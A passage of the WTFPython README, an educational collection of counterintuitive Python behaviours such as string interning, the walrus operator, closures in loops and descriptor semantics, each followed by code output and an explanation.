specified before the output. # Usage A nice way to get the most out of these examples, in my opinion, is to read them in sequential order, and for every example: - Carefully read the initial code for setting up the example. If you're an experienced Python programmer, you'll successfully anticipate what's going to happen next most of the time. - Read the output snippets and, + Check if the outputs are the same as you'd expect. + Make sure if you know the exact reason behind the output being the way it is. - If the answer is no (which is perfectly okay), take a deep breath, and read the explanation (and if you still don't understand, shout out! and create an issue [here](https://github.com/satwikkansal/wtfpython/issues/new)). - If yes, give a gentle pat on your back, and you may skip to the next example. PS: You can also read WTFPython at the command line using the [pypi package](https://pypi.python.org/pypi/wtfpython), ```sh $ pip install wtfpython -U $ wtfpython ``` --- # 👀 Examples ## Section: Strain your brain! ### ▶ First things first! * <!-- Example ID: d3d73936-3cf1-4632-b5ab-817981338863 --> <!-- read-only --> For some reason, the Python 3.8's "Walrus" operator (`:=`) has become quite popular. Let's check it out, 1\. 
```py # Python version 3.8+ >>> a = "wtf_walrus" >>> a 'wtf_walrus' >>> a := "wtf_walrus" File "<stdin>", line 1 a := "wtf_walrus" ^ SyntaxError: invalid syntax >>> (a := "wtf_walrus") # This works though 'wtf_walrus' >>> a 'wtf_walrus' ``` 2 \. ```py # Python version 3.8+ >>> a = 6, 9 >>> a (6, 9) >>> (a := 6, 9) (6, 9) >>> a 6 >>> a, b = 6, 9 # Typical unpacking >>> a, b (6, 9) >>> (a, b = 16, 19) # Oops File "<stdin>", line 1 (a, b = 16, 19) ^ SyntaxError: invalid syntax >>> (a, b := 16, 19) # This prints out a weird 3-tuple (6, 16, 19) >>> a # a is still unchanged? 6 >>> b 16 ``` #### 💡 Explanation **Quick walrus operator refresher** The Walrus operator (`:=`) was introduced in Python 3.8, it can be useful in situations where you'd want to assign values to variables within an expression. ```py def some_func(): # Assume some expensive computation here # time.sleep(1000) return 5 # So instead of, if some_func(): print(some_func()) # Which is bad practice since computation is happening twice # or a = some_func() if a: print(a) # Now you can concisely write if a := some_func(): print(a) ``` **Output (> 3.8):** ```py 5 5 5 ``` This saved one line of code, and implicitly prevented invoking `some_func` twice. - Unparenthesized "assignment expression" (use of walrus operator), is restricted at the top level, hence the `SyntaxError` in the `a := "wtf_walrus"` statement of the first snippet. Parenthesizing it worked as expected and assigned `a`. - As usual, parenthesizing of an expression containing `=` operator is not allowed. Hence the syntax error in `(a, b = 6, 9)`. - The syntax of the Walrus operator is of the form `NAME:= expr`, where `NAME` is a valid identifier, and `expr` is a valid expression. Hence, iterable packing and unpacking are not supported which means, - `(a := 6, 9)` is equivalent to `((a := 6), 9)` and ultimately `(a, 9) ` (where `a`'s value is 6') ```py >>> (a := 6, 9) == ((a := 6), 9) True >>> x = (a := 696, 9) >>> x (696, 9) >>> x[0] is a # Both reference same memory location True ``` - Similarly, `(a, b := 16, 19)` is equivalent to `(a, (b := 16), 19)` which is nothing but a 3-tuple. --- ### ▶ Strings can be tricky sometimes <!-- Example ID: 30f1d3fc-e267-4b30-84ef-4d9e7091ac1a ---> 1\. ```py >>> a = "some_string" >>> id(a) 140420665652016 >>> id("some" + "_" + "string") # Notice that both the ids are same. 140420665652016 ``` 2\. ```py >>> a = "wtf" >>> b = "wtf" >>> a is b True >>> a = "wtf!" >>> b = "wtf!" >>> a is b False ``` 3\. ```py >>> a, b = "wtf!", "wtf!" >>> a is b # All versions except 3.7.x True >>> a = "wtf!"; b = "wtf!" >>> a is b # This will print True or False depending on where you're invoking it (python shell / ipython / as a script) False ``` ```py # This time in file some_file.py a = "wtf!" b = "wtf!" print(a is b) # prints True when the module is invoked! ``` 4\. **Output (< Python3.7 )** ```py >>> 'a' * 20 is 'aaaaaaaaaaaaaaaaaaaa' True >>> 'a' * 21 is 'aaaaaaaaaaaaaaaaaaaaa' False ``` Makes sense, right? #### 💡 Explanation: + The behavior in first and second snippets is due to a CPython optimization (called string interning) that tries to use existing immutable objects in some cases rather than creating a new object every time. + After being "interned," many variables may reference the same string object in memory (saving memory thereby). + In the snippets above, strings are implicitly interned. The decision of when to implicitly intern a string is implementation-dependent. 
There are some rules that can be used to guess if a string will be interned or not: * All length 0 and length 1 strings are interned. * Strings are interned at compile time (`'wtf'` will be interned but `''.join(['w', 't', 'f'])` will not be interned) * Strings that are not composed of ASCII letters, digits or underscores, are not interned. This explains why `'wtf!'` was not interned due to `!`. CPython implementation of this rule can be found [here](https://github.com/python/cpython/blob/3.6/Objects/codeobject.c#L19) ![image](/images/string-intern/string_intern.png) + When `a` and `b` are set to `"wtf!"` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `"wtf!"` as an object (because `"wtf!"` is not implicitly interned as per the facts mentioned above). It's a compile-time optimization. This optimization doesn't apply to 3.7.x versions of CPython (check this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for more discussion). + A compile unit in an interactive environment like IPython consists of a single statement, whereas it consists of the entire module in case of modules. `a, b = "wtf!", "wtf!"` is single statement, whereas `a = "wtf!"; b = "wtf!"` are two statements in a single line. This explains why the identities are different in `a = "wtf!"; b = "wtf!"`, and also explain why they are same when invoked in `some_file.py` + The abrupt change in the output of the fourth snippet is due to a [peephole optimization](https://en.wikipedia.org/wiki/Peephole_optimization) technique known as Constant folding. This means the expression `'a'*20` is replaced by `'aaaaaaaaaaaaaaaaaaaa'` during compilation to save a few clock cycles during runtime. Constant folding only occurs for strings having a length of less than 21. (Why? Imagine the size of `.pyc` file generated as a result of the expression `'a'*10**10`). [Here's](https://github.com/python/cpython/blob/3.6/Python/peephole.c#L288) the implementation source for the same. + Note: In Python 3.7, Constant folding was moved out from peephole optimizer to the new AST optimizer with some change in logic as well, so the fourth snippet doesn't work for Python 3.7. You can read more about the change [here](https://bugs.python.org/issue11549). --- ### ▶ Be careful with chained operations <!-- Example ID: 07974979-9c86-4720-80bd-467aa19470d9 ---> ```py >>> (False == False) in [False] # makes sense False >>> False == (False in [False]) # makes sense False >>> False == False in [False] # now what? True >>> True is False == False False >>> False is False is False True >>> 1 > 0 < 1 True >>> (1 > 0) < 1 False >>> 1 > (0 < 1) False ``` #### 💡 Explanation: As per https://docs.python.org/3/reference/expressions.html#comparisons > Formally, if a, b, c, ..., y, z are expressions and op1, op2, ..., opN are comparison operators, then a op1 b op2 c ... y opN z is equivalent to a op1 b and b op2 c and ... y opN z, except that each expression is evaluated at most once. While such behavior might seem silly to you in the above examples, it's fantastic with stuff like `a == b == c` and `0 <= x <= 100`. * `False is False is False` is equivalent to `(False is False) and (False is False)` * `True is False == False` is equivalent to `(True is False) and (False == False)` and since the first part of the statement (`True is False`) evaluates to `False`, the overall expression evaluates to `False`. 
* `1 > 0 < 1` is equivalent to `(1 > 0) and (0 < 1)` which evaluates to `True`. * The expression `(1 > 0) < 1` is equivalent to `True < 1` and ```py >>> int(True) 1 >>> True + 1 #not relevant for this example, but just for fun 2 ``` So, `1 < 1` evaluates to `False` --- ### ▶ How not to use `is` operator <!-- Example ID: 230fa2ac-ab36-4ad1-b675-5f5a1c1a6217 ---> The following is a very famous example present all over the internet. 1\. ```py >>> a = 256 >>> b = 256 >>> a is b True >>> a = 257 >>> b = 257 >>> a is b False ``` 2\. ```py >>> a = [] >>> b = [] >>> a is b False >>> a = tuple() >>> b = tuple() >>> a is b True ``` 3\. **Output** ```py >>> a, b = 257, 257 >>> a is b True ``` **Output (Python 3.7.x specifically)** ```py >>> a, b = 257, 257 >>> a is b False ``` #### 💡 Explanation: **The difference between `is` and `==`** * `is` operator checks if both the operands refer to the same object (i.e., it checks if the identity of the operands matches or not). * `==` operator compares the values of both the operands and checks if they are the same. * So `is` is for reference equality and `==` is for value equality. An example to clear things up, ```py >>> class A: pass >>> A() is A() # These are two empty objects at two different memory locations. False ``` **`256` is an existing object but `257` isn't** When you start up python the numbers from `-5` to `256` will be allocated. These numbers are used a lot, so it makes sense just to have them ready. Quoting from https://docs.python.org/3/c-api/long.html > The current implementation keeps an array of integer objects for all integers between -5 and 256, when you create an int in that range you just get back a reference to the existing object. So it should be possible to change the value of 1. I suspect the behavior of Python, in this case, is undefined. :-) ```py >>> id(256) 10922528 >>> a = 256 >>> b = 256 >>> id(a) 10922528 >>> id(b) 10922528 >>> id(257) 140084850247312 >>> x = 257 >>> y = 257 >>> id(x) 140084850247440 >>> id(y) 140084850247344 ``` Here the interpreter isn't smart enough while executing `y = 257` to recognize that we've already created an integer of the value `257,` and so it goes on to create another object in the memory. Similar optimization applies to other **immutable** objects like empty tuples as well. Since lists are mutable, that's why `[] is []` will return `False` and `() is ()` will return `True`. This explains our second snippet. Let's move on to the third one, **Both `a` and `b` refer to the same object when initialized with same value in the same line.** **Output** ```py >>> a, b = 257, 257 >>> id(a) 140640774013296 >>> id(b) 140640774013296 >>> a = 257 >>> b = 257 >>> id(a) 140640774013392 >>> id(b) 140640774013488 ``` * When a and b are set to `257` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `257` as an object. * It's a compiler optimization and specifically applies to the interactive environment. When you enter two lines in a live interpreter, they're compiled separately, therefore optimized separately. If you were to try this example in a `.py` file, you would not see the same behavior, because the file is compiled all at once. 
This optimization is not limited to integers, it works for other immutable data types like strings (check the "Strings are tricky example") and floats as well, ```py >>> a, b = 257.0, 257.0 >>> a is b True ``` * Why didn't this work for Python 3.7? The abstract reason is because such compiler optimizations are implementation specific (i.e. may change with version, OS, etc). I'm still figuring out what exact implementation change cause the issue, you can check out this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for updates. --- ### ▶ Hash brownies <!-- Example ID: eb17db53-49fd-4b61-85d6-345c5ca213ff ---> 1\. ```py some_dict = {} some_dict[5.5] = "JavaScript" some_dict[5.0] = "Ruby" some_dict[5] = "Python" ``` **Output:** ```py >>> some_dict[5.5] "JavaScript" >>> some_dict[5.0] # "Python" destroyed the existence of "Ruby"? "Python" >>> some_dict[5] "Python" >>> complex_five = 5 + 0j >>> type(complex_five) complex >>> some_dict[complex_five] "Python" ``` So, why is Python all over the place? #### 💡 Explanation * Uniqueness of keys in a Python dictionary is by *equivalence*, not identity. So even though `5`, `5.0`, and `5 + 0j` are distinct objects of different types, since they're equal, they can't both be in the same `dict` (or `set`). As soon as you insert any one of them, attempting to look up any distinct but equivalent key will succeed with the original mapped value (rather than failing with a `KeyError`): ```py >>> 5 == 5.0 == 5 + 0j True >>> 5 is not 5.0 is not 5 + 0j True >>> some_dict = {} >>> some_dict[5.0] = "Ruby" >>> 5.0 in some_dict True >>> (5 in some_dict) and (5 + 0j in some_dict) True ``` * This applies when setting an item as well. So when you do `some_dict[5] = "Python"`, Python finds the existing item with equivalent key `5.0 -> "Ruby"`, overwrites its value in place, and leaves the original key alone. ```py >>> some_dict {5.0: 'Ruby'} >>> some_dict[5] = "Python" >>> some_dict {5.0: 'Python'} ``` * So how can we update the key to `5` (instead of `5.0`)? We can't actually do this update in place, but what we can do is first delete the key (`del some_dict[5.0]`), and then set it (`some_dict[5]`) to get the integer `5` as the key instead of floating `5.0`, though this should be needed in rare cases. * How did Python find `5` in a dictionary containing `5.0`? Python does this in constant time without having to scan through every item by using hash functions. When Python looks up a key `foo` in a dict, it first computes `hash(foo)` (which runs in constant-time). Since in Python it is required that objects that compare equal also have the same hash value ([docs](https://docs.python.org/3/reference/datamodel.html#object.__hash__) here), `5`, `5.0`, and `5 + 0j` have the same hash value. ```py >>> 5 == 5.0 == 5 + 0j True >>> hash(5) == hash(5.0) == hash(5 + 0j) True ``` **Note:** The inverse is not necessarily true: Objects with equal hash values may themselves be unequal. (This causes what's known as a [hash collision](https://en.wikipedia.org/wiki/Collision_(computer_science)), and degrades the constant-time performance that hashing usually provides.) --- ### ▶ Deep down, we're all the same. 
<!-- Example ID: 8f99a35f-1736-43e2-920d-3b78ec35da9b ---> ```py class WTF: pass ``` **Output:** ```py >>> WTF() == WTF() # two different instances can't be equal False >>> WTF() is WTF() # identities are also different False >>> hash(WTF()) == hash(WTF()) # hashes _should_ be different as well True >>> id(WTF()) == id(WTF()) True ``` #### 💡 Explanation: * When `id` was called, Python created a `WTF` class object and passed it to the `id` function. The `id` function takes its `id` (its memory location), and throws away the object. The object is destroyed. * When we do this twice in succession, Python allocates the same memory location to this second object as well. Since (in CPython) `id` uses the memory location as the object id, the id of the two objects is the same. * So, the object's id is unique only for the lifetime of the object. After the object is destroyed, or before it is created, something else can have the same id. * But why did the `is` operator evaluate to `False`? Let's see with this snippet. ```py class WTF(object): def __init__(self): print("I") def __del__(self): print("D") ``` **Output:** ```py >>> WTF() is WTF() I I D D False >>> id(WTF()) == id(WTF()) I D I D True ``` As you may observe, the order in which the objects are destroyed is what made all the difference here. --- ### ▶ Disorder within order * <!-- Example ID: 91bff1f8-541d-455a-9de4-6cd8ff00ea66 ---> ```py from collections import OrderedDict dictionary = dict() dictionary[1] = 'a'; dictionary[2] = 'b'; ordered_dict = OrderedDict() ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; another_ordered_dict = OrderedDict() another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; class DictWithHash(dict): """ A dict that also implements __hash__ magic. """ __hash__ = lambda self: 0 class OrderedDictWithHash(OrderedDict): """ An OrderedDict that also implements __hash__ magic. """ __hash__ = lambda self: 0 ``` **Output** ```py >>> dictionary == ordered_dict # If a == b True >>> dictionary == another_ordered_dict # and b == c True >>> ordered_dict == another_ordered_dict # then why isn't c == a ?? False # We all know that a set consists of only unique elements, # let's try making a set of these dictionaries and see what happens... >>> len({dictionary, ordered_dict, another_ordered_dict}) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unhashable type: 'dict' # Makes sense since dict don't have __hash__ implemented, let's use # our wrapper classes. >>> dictionary = DictWithHash() >>> dictionary[1] = 'a'; dictionary[2] = 'b'; >>> ordered_dict = OrderedDictWithHash() >>> ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; >>> another_ordered_dict = OrderedDictWithHash() >>> another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; >>> len({dictionary, ordered_dict, another_ordered_dict}) 1 >>> len({ordered_dict, another_ordered_dict, dictionary}) # changing the order 2 ``` What is going on here? #### 💡 Explanation: - The reason why intransitive equality didn't hold among `dictionary`, `ordered_dict` and `another_ordered_dict` is because of the way `__eq__` method is implemented in `OrderedDict` class. From the [docs](https://docs.python.org/3/library/collections.html#ordereddict-objects) > Equality tests between OrderedDict objects are order-sensitive and are implemented as `list(od1.items())==list(od2.items())`. Equality tests between `OrderedDict` objects and other Mapping objects are order-insensitive like regular dictionaries. 
- The reason for this equality in behavior is that it allows `OrderedDict` objects to be directly substituted anywhere a regular dictionary is used. - Okay, so why did changing the order affect the length of the generated `set` object? The answer is the lack of intransitive equality only. Since sets are "unordered" collections of unique elements, the order in which elements are inserted shouldn't matter. But in this case, it does matter. Let's break it down a bit, ```py >>> some_set = set() >>> some_set.add(dictionary) # these are the mapping objects from the snippets above >>> ordered_dict in some_set True >>> some_set.add(ordered_dict) >>> len(some_set) 1 >>> another_ordered_dict in some_set True >>> some_set.add(another_ordered_dict) >>> len(some_set) 1 >>> another_set = set() >>> another_set.add(ordered_dict) >>> another_ordered_dict in another_set False >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 >>> dictionary in another_set True >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 ``` So the inconsistency is due to `another_ordered_dict in another_set` being `False` because `ordered_dict` was already present in `another_set` and as observed before, `ordered_dict == another_ordered_dict` is `False`. --- ### ▶ Keep trying... * <!-- Example ID: b4349443-e89f-4d25-a109-82616be9d41a ---> ```py def some_func(): try: return 'from_try' finally: return 'from_finally' def another_func(): for _ in range(3): try: continue finally: print("Finally!") def one_more_func(): # A gotcha! try: for i in range(3): try: 1 / i except ZeroDivisionError: # Let's throw it here and handle it outside for loop raise ZeroDivisionError("A trivial divide by zero error") finally: print("Iteration", i) break except ZeroDivisionError as e: print("Zero division error occurred", e) ``` **Output:** ```py >>> some_func() 'from_finally' >>> another_func() Finally! Finally! Finally! >>> 1 / 0 Traceback (most recent call last): File "<stdin>", line 1, in <module> ZeroDivisionError: division by zero >>> one_more_func() Iteration 0 ``` #### 💡 Explanation: - When a `return`, `break` or `continue` statement is executed in the `try` suite of a "try…finally" statement, the `finally` clause is also executed on the way out. - The return value of a function is determined by the last `return` statement executed. Since the `finally` clause always executes, a `return` statement executed in the `finally` clause will always be the last one executed. - The caveat here is, if the finally clause executes a `return` or `break` statement, the temporarily saved exception is discarded. --- ### ▶ For what? <!-- Example ID: 64a9dccf-5083-4bc9-98aa-8aeecde4f210 ---> ```py some_string = "wtf" some_dict = {} for i, some_dict[i] in enumerate(some_string): i = 10 ``` **Output:** ```py >>> some_dict # An indexed dict appears. {0: 'w', 1: 't', 2: 'f'} ``` #### 💡 Explanation: * A `for` statement is defined in the [Python grammar](https://docs.python.org/3/reference/grammar.html) as: ``` for_stmt: 'for' exprlist 'in' testlist ':' suite ['else' ':' suite] ``` Where `exprlist` is the assignment target. This means that the equivalent of `{exprlist} = {next_value}` is **executed for each item** in the iterable. An interesting example that illustrates this: ```py for i in range(4): print(i) i = 10 ``` **Output:** ``` 0 1 2 3 ``` Did you expect the loop to run just once? **💡 Explanation:** - The assignment statement `i = 10` never affects the iterations of the loop because of the way for loops work in Python. 
Before the beginning of every iteration, the next item provided by the iterator (`range(4)` in this case) is unpacked and assigned the target list variables (`i` in this case). * The `enumerate(some_string)` function yields a new value `i` (a counter going up) and a character from the `some_string` in each iteration. It then sets the (just assigned) `i` key of the dictionary `some_dict` to that character. The unrolling of the loop can be simplified as: ```py >>> i, some_dict[i] = (0, 'w') >>> i, some_dict[i] = (1, 't') >>> i, some_dict[i] = (2, 'f') >>> some_dict ``` --- ### ▶ Evaluation time discrepancy <!-- Example ID: 6aa11a4b-4cf1-467a-b43a-810731517e98 ---> 1\. ```py array = [1, 8, 15] # A typical generator expression gen = (x for x in array if array.count(x) > 0) array = [2, 8, 22] ``` **Output:** ```py >>> print(list(gen)) # Where did the other values go? [8] ``` 2\. ```py array_1 = [1,2,3,4] gen_1 = (x for x in array_1) array_1 = [1,2,3,4,5] array_2 = [1,2,3,4] gen_2 = (x for x in array_2) array_2[:] = [1,2,3,4,5] ``` **Output:** ```py >>> print(list(gen_1)) [1, 2, 3, 4] >>> print(list(gen_2)) [1, 2, 3, 4, 5] ``` 3\. ```py array_3 = [1, 2, 3] array_4 = [10, 20, 30] gen = (i + j for i in array_3 for j in array_4) array_3 = [4, 5, 6] array_4 = [400, 500, 600] ``` **Output:** ```py >>> print(list(gen)) [401, 501, 601, 402, 502, 602, 403, 503, 603] ``` #### 💡 Explanation - In a [generator](https://wiki.python.org/moin/Generators) expression, the `in` clause is evaluated at declaration time, but the conditional clause is evaluated at runtime. - So before runtime, `array` is re-assigned to the list `[2, 8, 22]`, and since out of `1`, `8` and `15`, only the count of `8` is greater than `0`, the generator only yields `8`. - The differences in the output of `g1` and `g2` in the second part is due the way variables `array_1` and `array_2` are re-assigned values. - In the first case, `array_1` is bound to the new object `[1,2,3,4,5]` and since the `in` clause is evaluated at the declaration time it still refers to the old object `[1,2,3,4]` (which is not destroyed). - In the second case, the slice assignment to `array_2` updates the same old object `[1,2,3,4]` to `[1,2,3,4,5]`. Hence both the `g2` and `array_2` still have reference to the same object (which has now been updated to `[1,2,3,4,5]`). - Okay, going by the logic discussed so far, shouldn't be the value of `list(gen)` in the third snippet be `[11, 21, 31, 12, 22, 32, 13, 23, 33]`? (because `array_3` and `array_4` are going to behave just like `array_1`). The reason why (only) `array_4` values got updated is explained in [PEP-289](https://www.python.org/dev/peps/pep-0289/#the-details) > Only the outermost for-expression is evaluated immediately, the other expressions are deferred until the generator is run. --- ### ▶ `is not ...` is not `is (not ...)` <!-- Example ID: b26fb1ed-0c7d-4b9c-8c6d-94a58a055c0d ---> ```py >>> 'something' is not None True >>> 'something' is (not None) False ``` #### 💡 Explanation - `is not` is a single binary operator, and has behavior different than using `is` and `not` separated. - `is not` evaluates to `False` if the variables on either side of the operator point to the same object and `True` otherwise. - In the example, `(not None)` evaluates to `True` since the value `None` is `False` in a boolean context, so the expression becomes `'something' is True`. --- ### ▶ A tic-tac-toe where X wins in the first attempt! 
<!-- Example ID: 69329249-bdcb-424f-bd09-cca2e6705a7a ---> ```py # Let's initialize a row row = [""] * 3 #row i['', '', ''] # Let's make a board board = [row] * 3 ``` **Output:** ```py >>> board [['', '', ''], ['', '', ''], ['', '', '']] >>> board[0] ['', '', ''] >>> board[0][0] '' >>> board[0][0] = "X" >>> board [['X', '', ''], ['X', '', ''], ['X', '', '']] ``` We didn't assign three `"X"`s, did we? #### 💡 Explanation: When we initialize `row` variable, this visualization explains what happens in the memory ![image](/images/tic-tac-toe/after_row_initialized.png) And when the `board` is initialized by multiplying the `row`, this is what happens inside the memory (each of the elements `board[0]`, `board[1]` and `board[2]` is a reference to the same list referred by `row`) ![image](/images/tic-tac-toe/after_board_initialized.png) We can avoid this scenario here by not using `row` variable to generate `board`. (Asked in [this](https://github.com/satwikkansal/wtfpython/issues/68) issue). ```py >>> board = [['']*3 for _ in range(3)] >>> board[0][0] = "X" >>> board [['X', '', ''], ['', '', ''], ['', '', '']] ``` --- ### ▶ Schrödinger's variable * <!-- Example ID: 4dc42f77-94cb-4eb5-a120-8203d3ed7604 ---> ```py funcs = [] results = [] for x in range(7): def some_func(): return x funcs.append(some_func) results.append(some_func()) # note the function call here funcs_results = [func() for func in funcs] ``` **Output (Python version):** ```py >>> results [0, 1, 2, 3, 4, 5, 6] >>> funcs_results [6, 6, 6, 6, 6, 6, 6] ``` The values of `x` were different in every iteration prior to appending `some_func` to `funcs`, but all the functions return 6 when they're evaluated after the loop completes. 2. ```py >>> powers_of_x = [lambda x: x**i for i in range(10)] >>> [f(2) for f in powers_of_x] [512, 512, 512, 512, 512, 512, 512, 512, 512, 512] ``` #### 💡 Explanation: * When defining a function inside a loop that uses the loop variable in its body, the loop function's closure is bound to the *variable*, not its *value*. The function looks up `x` in the surrounding context, rather than using the value of `x` at the time the function is created. So all of the functions use the latest value assigned to the variable for computation. We can see that it's using the `x` from the surrounding context (i.e. *not* a local variable) with: ```py >>> import inspect >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={'x': 6}, builtins={}, unbound=set()) ``` Since `x` is a global value, we can change the value that the `funcs` will lookup and return by updating `x`: ```py >>> x = 42 >>> [func() for func in funcs] [42, 42, 42, 42, 42, 42, 42] ``` * To get the desired behavior you can pass in the loop variable as a named variable to the function. **Why does this work?** Because this will define the variable *inside* the function's scope. It will no longer go to the surrounding (global) scope to look up the variables value but will create a local variable that stores the value of `x` at that point in time. ```py funcs = [] for x in range(7): def some_func(x=x): return x funcs.append(some_func) ``` **Output:** ```py >>> funcs_results = [func() for func in funcs] >>> funcs_results [0, 1, 2, 3, 4, 5, 6] ``` It is not longer using the `x` in the global scope: ```py >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={}, builtins={}, unbound=set()) ``` --- ### ▶ The chicken-egg problem * <!-- Example ID: 60730dc2-0d79-4416-8568-2a63323b3ce8 ---> 1\. 
```py >>> isinstance(3, int) True >>> isinstance(type, object) True >>> isinstance(object, type) True ``` So which is the "ultimate" base class? There's more to the confusion by the way, 2\. ```py >>> class A: pass >>> isinstance(A, A) False >>> isinstance(type, type) True >>> isinstance(object, object) True ``` 3\. ```py >>> issubclass(int, object) True >>> issubclass(type, object) True >>> issubclass(object, type) False ``` #### 💡 Explanation - `type` is a [metaclass](https://realpython.com/python-metaclasses/) in Python. - **Everything** is an `object` in Python, which includes classes as well as their objects (instances). - class `type` is the metaclass of class `object`, and every class (including `type`) has inherited directly or indirectly from `object`. - There is no real base class among `object` and `type`. The confusion in the above snippets is arising because we're thinking about these relationships (`issubclass` and `isinstance`) in terms of Python classes. The relationship between `object` and `type` can't be reproduced in pure python. To be more precise the following relationships can't be reproduced in pure Python, + class A is an instance of class B, and class B is an instance of class A. + class A is an instance of itself. - These relationships between `object` and `type` (both being instances of each other as well as themselves) exist in Python because of "cheating" at the implementation level. --- ### ▶ Subclass relationships <!-- Example ID: 9f6d8cf0-e1b5-42d0-84a0-4cfab25a0bc0 ---> **Output:** ```py >>> from collections.abc import Hashable >>> issubclass(list, object) True >>> issubclass(object, Hashable) True >>> issubclass(list, Hashable) False ``` The Subclass relationships were expected to be transitive, right? (i.e., if `A` is a subclass of `B`, and `B` is a subclass of `C`, the `A` _should_ a subclass of `C`) #### 💡 Explanation: * Subclass relationships are not necessarily transitive in Python. Anyone is allowed to define their own, arbitrary `__subclasscheck__` in a metaclass. * When `issubclass(cls, Hashable)` is called, it simply looks for non-Falsey "`__hash__`" method in `cls` or anything it inherits from. * Since `object` is hashable, but `list` is non-hashable, it breaks the transitivity relation. * More detailed explanation can be found [here](https://www.naftaliharris.com/blog/python-subclass-intransitivity/). --- ### ▶ Methods equality and identity <!-- Example ID: 94802911-48fe-4242-defa-728ae893fa32 ---> 1. ```py class SomeClass: def method(self): pass @classmethod def classm(cls): pass @staticmethod def staticm(): pass ``` **Output:** ```py >>> print(SomeClass.method is SomeClass.method) True >>> print(SomeClass.classm is SomeClass.classm) False >>> print(SomeClass.classm == SomeClass.classm) True >>> print(SomeClass.staticm is SomeClass.staticm) True ``` Accessing `classm` twice, we get an equal object, but not the *same* one? Let's see what happens with instances of `SomeClass`: 2. ```py o1 = SomeClass() o2 = SomeClass() ``` **Output:** ```py >>> print(o1.method == o2.method) False >>> print(o1.method == o1.method) True >>> print(o1.method is o1.method) False >>> print(o1.classm is o1.classm) False >>> print(o1.classm == o1.classm == o2.classm == SomeClass.classm) True >>> print(o1.staticm is o1.staticm is o2.staticm is SomeClass.staticm) True ``` Accessing `classm` or `method` twice, creates equal but not *same* objects for the same instance of `SomeClass`. 
#### 💡 Explanation * Functions are [descriptors](https://docs.python.org/3/howto/descriptor.html). Whenever a function is accessed as an attribute, the descriptor is invoked, creating a method object which "binds" the function with the object owning the attribute. If called, the method calls the function, implicitly passing the bound object as the first argument (this is how we get `self` as the first argument, despite not passing it explicitly). ```py >>> o1.method <bound method SomeClass.method of <__main__.SomeClass object at ...>> ``` * Accessing the attribute multiple times creates a method object every time! Therefore `o1.method is o1.method` is never truthy. Accessing functions as class attributes (as opposed to instance) does not create methods, however; so `SomeClass.method is SomeClass.method` is truthy. ```py >>> SomeClass.method <function SomeClass.method at ...> ``` * `classmethod` transforms functions into class methods. Class methods are descriptors that, when accessed, create a method object which binds the *class* (type) of the object, instead of the object itself. ```py >>> o1.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * Unlike functions, `classmethod`s will create a method also when accessed as class attributes (in which case they bind the class, not to the type of it). So `SomeClass.classm is SomeClass.classm` is falsy. ```py >>> SomeClass.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * A method object compares equal when both the functions are equal, and the bound objects are the same. So `o1.method == o1.method` is truthy, although not the same object in memory. * `staticmethod` transforms functions into a "no-op" descriptor, which returns the function as-is. No method objects are ever created, so comparison with `is` is truthy. ```py >>> o1.staticm <function SomeClass.staticm at ...> >>> SomeClass.staticm <function SomeClass.staticm at ...> ``` * Having to create new "method" objects every time Python calls instance methods and having to modify the arguments every time in order to insert `self` affected performance badly. CPython 3.7 [solved it](https://bugs.python.org/issue26110) by introducing new opcodes that deal with calling methods without creating the temporary method objects. This is used only when the accessed function is actually called, so the snippets here are not affected, and still generate methods :) ### ▶ All-true-ation * <!-- Example ID: dfe6d845-e452-48fe-a2da-0ed3869a8042 --> ```py >>> all([True, True, True]) True >>> all([True, True, False]) False >>> all([]) True >>> all([[]]) False >>> all([[[]]]) True ``` Why's this True-False alteration? #### 💡 Explanation: - The implementation of `all` function is equivalent to - ```py def all(iterable): for element in iterable: if not element: return False return True ``` - `all([])` returns `True` since the iterable is empty. - `all([[]])` returns `False` because the passed array has one element, `[]`, and in python, an empty list is falsy. - `all([[[]]])` and higher recursive variants are always `True`. This is because the passed array's single element (`[[...]]`) is no longer empty, and lists with values are truthy. --- ### ▶ The surprising comma <!-- Example ID: 31a819c8-ed73-4dcc-84eb-91bedbb51e58 ---> **Output (< 3.6):** ```py >>> def f(x, y,): ... print(x, y) ... >>> def g(x=4, y=5,): ... print(x, y) ... 
>>> def h(x, **kwargs,):
  File "<stdin>", line 1
    def h(x, **kwargs,):
                      ^
SyntaxError: invalid syntax

>>> def h(*args,):
  File "<stdin>", line 1
    def h(*args,):
                ^
SyntaxError: invalid syntax
```

#### 💡 Explanation:

- A trailing comma is not always legal in the formal parameter list of a Python function.
- In Python's grammar, the argument list is defined partly with leading commas and partly with trailing commas. This conflict causes situations where a comma is trapped in the middle, and no rule accepts it.
- **Note:** The trailing comma problem is [fixed in Python 3.6](https://bugs.python.org/issue9232). The remarks in [this](https://bugs.python.org/issue9232#msg248399) post briefly discuss the different usages of trailing commas in Python.

---

### ▶ Strings and the backslashes

<!-- Example ID: 6ae622c3-6d99-4041-9b33-507bd1a4407b --->

**Output:**

```py
>>> print("\"")
"

>>> print(r"\"")
\"

>>> print(r"\")
  File "<stdin>", line 1
    print(r"\")
              ^
SyntaxError: EOL while scanning string literal

>>> r'\'' == "\\'"
True
```

#### 💡 Explanation

- In a usual Python string, the backslash is used to escape characters that may have a special meaning (like single-quote, double-quote, and the backslash itself).

```py
>>> "wt\"f"
'wt"f'
```

- In a raw string literal (as indicated by the prefix `r`), the backslashes are passed through as-is, yet a backslash still "escapes" the character that follows it (both characters end up in the string).

```py
>>> r'wt\"f' == 'wt\\"f'
True
>>> print(repr(r'wt\"f'))
'wt\\"f'

>>> print("\n")

>>> print(r"\\n")
'\\n'
```

